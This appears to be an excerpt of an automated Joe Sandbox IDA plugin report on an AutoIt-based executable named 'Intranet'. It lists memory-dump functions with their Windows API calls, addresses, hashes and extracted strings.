                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 8b4b58ea50cc72194f68a022b69c3ecac03a877a8bb665bca8d6d4d3fbdb0357
                                                                            • Instruction ID: d71a025c301fed0e9d2f285015f15cf2cda2e67a5513670ebe6a2f65ca766fd1
                                                                            • Opcode Fuzzy Hash: 8b4b58ea50cc72194f68a022b69c3ecac03a877a8bb665bca8d6d4d3fbdb0357
                                                                            • Instruction Fuzzy Hash: 5B51D730B80209EBEB00DB20DEE69BD7FA1FB88345B244457F802A72D1E775AE45CB55
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0052A0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0052A1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0052A1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: e50a91286611b4b2672b94a95f357269d4d41fa72c7bd2f81c659eb132d2b62b
                                                                            • Instruction ID: 2fbe93c8f3f8a054f385bc53c717134a2e60e85d3db5cb4b13b43aa95cd1e61a
                                                                            • Opcode Fuzzy Hash: e50a91286611b4b2672b94a95f357269d4d41fa72c7bd2f81c659eb132d2b62b
                                                                            • Instruction Fuzzy Hash: 99020E30208321AFDB15CF14E849BAABFE4FF9A714F04891DF995862E1C774D848DB92
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052AF51
                                                                            • SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000), ref: 0052AF55
                                                                            • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF6B
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF76
                                                                            • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF7B
                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF93
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFA1
                                                                            • SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFB2
                                                                            • SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFBB
                                                                            • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFC8
                                                                            • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFE7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052AFFE
                                                                            • GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B013
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052B05F
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B086
                                                                            • InflateRect.USER32(?,000000FD,000000FD,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052B0A4
                                                                            • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052B0AF
                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0BD
                                                                            • SetTextColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0C5
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0D9
                                                                            • SelectObject.GDI32(?,0052AC1F,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0F0
                                                                            • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0FB
                                                                            • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B101
                                                                            • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B106
                                                                            • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B10C
                                                                            • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B116
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 8a41b0b14fe3c1ce7fe50fbedfff6b6509045a6b67ba0974732b6ae78f24150a
                                                                            • Instruction ID: 2c8346dd0e1a3743646decc21780febc8680d06df8d6bc11955004943704fe10
                                                                            • Opcode Fuzzy Hash: 8a41b0b14fe3c1ce7fe50fbedfff6b6509045a6b67ba0974732b6ae78f24150a
                                                                            • Instruction Fuzzy Hash: 43615972900218AFDB119FA4EC48AAEBFB9FF09320F105115F925AB2E1D7759944DF90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E,?,?,?,?,?), ref: 005290EA
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005290FB
                                                                            • CharNextW.USER32(0000014E), ref: 0052912A
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0052916B
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158,?,0000014E,005677C4), ref: 00529181
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00529192
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E,?,?,?,?,?), ref: 005291AF
                                                                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 005291FB
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00529211
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00529242
                                                                            • _memset.LIBCMT ref: 00529267
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004,00000000,0000014E,005677C4), ref: 005292B0
                                                                            • _memset.LIBCMT ref: 0052930F
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00529339
                                                                            • SendMessageW.USER32(?,00001074,?,00000001,00000000,0000014E,005677C4), ref: 00529391
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0052943E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00529460
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005294AA
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005294D7
                                                                            • DrawMenuBar.USER32(?), ref: 005294E6
                                                                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0052950E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: bb4f59f57fe25fbf9bbed36b7e38d094cbd5daefe2f60b86b66ea56fd84e3940
                                                                            • Instruction ID: 9898971cfba92ffb7892c316b3ef328ec4bfbbdbf6f67852f02c41415364b5e4
                                                                            • Opcode Fuzzy Hash: bb4f59f57fe25fbf9bbed36b7e38d094cbd5daefe2f60b86b66ea56fd84e3940
                                                                            • Instruction Fuzzy Hash: 2FE19C74900229AFDB219F55DC88EEE7FB8FF0A714F00815AF915AA2D0D7748A85DF60
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00525007
                                                                            • GetDesktopWindow.USER32(?), ref: 0052501C
                                                                            • GetWindowRect.USER32(00000000), ref: 00525023
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00525085
                                                                            • DestroyWindow.USER32(?), ref: 005250B1
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005250DA
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005250F8
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0052511E
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00525133
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00525146
                                                                            • IsWindowVisible.USER32(?), ref: 00525166
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00525181
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00525195
                                                                            • GetWindowRect.USER32(?,?), ref: 005251AD
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 005251D3
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 005251ED
                                                                            • CopyRect.USER32(?,?), ref: 00525204
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0052526F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 372381596ab03b922feeb58d5927c64af6916bd6c15dfba155ee46e7a57966e1
                                                                            • Instruction ID: decc3d0a694db52ed3b92239c50a38c581956418673c8377bdefe528f1ce446f
                                                                            • Opcode Fuzzy Hash: 372381596ab03b922feeb58d5927c64af6916bd6c15dfba155ee46e7a57966e1
                                                                            • Instruction Fuzzy Hash: FDB1AB71604710AFD704DF64D989B6ABBE4BF8A314F008A1DF5999B2D1E770E804CB96
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0050499C
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005049C2
                                                                            • _wcscpy.LIBCMT ref: 005049F0
                                                                            • _wcscmp.LIBCMT ref: 005049FB
                                                                            • _wcscat.LIBCMT ref: 00504A11
                                                                            • _wcsstr.LIBCMT ref: 00504A1C
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00504A38
                                                                            • _wcscat.LIBCMT ref: 00504A81
                                                                            • _wcscat.LIBCMT ref: 00504A88
                                                                            • _wcsncpy.LIBCMT ref: 00504AB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 699586101-1459072770
                                                                            • Opcode ID: 230914a32b882313f84f735a7f32d556beb5f18374dd7317e6cda07ee315c2ff
                                                                            • Instruction ID: dc7910149ad9258c4767ce705d94becc97423d3ede79958534ae9acce80a6254
                                                                            • Opcode Fuzzy Hash: 230914a32b882313f84f735a7f32d556beb5f18374dd7317e6cda07ee315c2ff
                                                                            • Instruction Fuzzy Hash: 6B4108796002047ADB11BA228D47FBF7B6CEF41710F00445FF905A61D2EB789E119AB9
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A2C8C
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004A2C94
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A2CBF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004A2CC7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 004A2CEC
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004A2D09
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004A2D19
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004A2D4C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004A2D60
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 004A2D7E
                                                                            • GetStockObject.GDI32(00000011,00000000), ref: 004A2D9A
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 004A2DA5
                                                                              • Part of subcall function 004A2714: GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
                                                                              • Part of subcall function 004A2714: ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
                                                                            • SetTimer.USER32(00000000,00000000,00000028,004A13C7,00000000,000000FF), ref: 004A2DCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: 95dca173c51947508db3d24e2c5cca8e33862d6f04308f7427c931945b899fbc
                                                                            • Instruction ID: 5121a489e953cf77aaa83d2e6f654d48f2989729cbd2835b5cb5bb8b419945c6
                                                                            • Opcode Fuzzy Hash: 95dca173c51947508db3d24e2c5cca8e33862d6f04308f7427c931945b899fbc
                                                                            • Instruction Fuzzy Hash: 64B17E7160020A9FDB14DFA8CD95BAE7BA4FB28314F10412AFA15A73D0DBB4E851EB54
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • GetForegroundWindow.USER32(00530980,?,?,?,?,?), ref: 004C04E3
                                                                            • IsWindow.USER32(?,?,?,?,00530980,?,?,00000000,00530980), ref: 004F66BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Foreground_memmove
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 3828923867-1919597938
                                                                            • Opcode ID: 72d17fbc52e1cce30b2ac43b06f390b27ced78bf4690cf105756f54699853ecf
                                                                            • Instruction ID: 3a9266cec2b7d4bb717ffa9f37d778cf7781dd5c0ffe11abf2b2faabfacae50a
                                                                            • Opcode Fuzzy Hash: 72d17fbc52e1cce30b2ac43b06f390b27ced78bf4690cf105756f54699853ecf
                                                                            • Instruction Fuzzy Hash: E3D1C730104306EBDB04EF21C451AAABBB5BF54348F10461FF956936A2DB38F959CB9A
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 005244AC
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000,00530980), ref: 0052456C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            • API String ID: 3974292440-719923060
                                                                            • Opcode ID: 7aac2b157b91a5a9b4d25704dd125d5651d73bee66d0e3464bd9a7e13e08b721
                                                                            • Instruction ID: 09f9759b458b27b8d367d92df5a483606677bbab34f2e20c4bd251c28fe322ed
                                                                            • Opcode Fuzzy Hash: 7aac2b157b91a5a9b4d25704dd125d5651d73bee66d0e3464bd9a7e13e08b721
                                                                            • Instruction Fuzzy Hash: 30A1B1342043119FCB14EF21D851A6ABBA5FF86318F10492EF8A65B3D2DB38ED09CB55
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 005156E1
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 005156EC
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 005156F7
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00515702
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0051570D
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00515718
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00515723
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 0051572E
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00515739
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00515744
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 0051574F
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 0051575A
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00515765
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00515770
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0051577B
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00515786
                                                                            • GetCursorInfo.USER32(?), ref: 00515796
                                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 005157C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: aae55e1186a28728e2f4d3c39084982edf4b7dd06c415cb17ae7cedb64f68e58
                                                                            • Instruction ID: f3db925965f5b77ea9bd90ae3ed2d94dfc81f60d1c836cb50886ddcf1c8a755f
                                                                            • Opcode Fuzzy Hash: aae55e1186a28728e2f4d3c39084982edf4b7dd06c415cb17ae7cedb64f68e58
                                                                            • Instruction Fuzzy Hash: 52418770E04319AADB109FBA8C49D6EFFF8EF91B50B10452FE109E7290DAB86401CE51
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004FB17B
                                                                            • __swprintf.LIBCMT ref: 004FB21C
                                                                            • _wcscmp.LIBCMT ref: 004FB22F
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?,00000202,?), ref: 004FB284
                                                                            • _wcscmp.LIBCMT ref: 004FB2C0
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004FB2F7
                                                                            • GetDlgCtrlID.USER32(?), ref: 004FB349
                                                                            • GetWindowRect.USER32(?,?), ref: 004FB37F
                                                                            • GetParent.USER32(?,?), ref: 004FB39D
                                                                            • ScreenToClient.USER32(00000000), ref: 004FB3A4
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004FB41E
                                                                            • _wcscmp.LIBCMT ref: 004FB432
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004FB458
                                                                            • _wcscmp.LIBCMT ref: 004FB46C
                                                                              • Part of subcall function 004C385C: _iswctype.LIBCMT ref: 004C3864
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: 7a0147a565255f9f3c9bb86212bdb5a3cde82b27d8472aa38a895c4e65b2a0c5
                                                                            • Instruction ID: b0280478f6881a852356455bb33786a0e32163babfe90f70bba317fe11f81ada
                                                                            • Opcode Fuzzy Hash: 7a0147a565255f9f3c9bb86212bdb5a3cde82b27d8472aa38a895c4e65b2a0c5
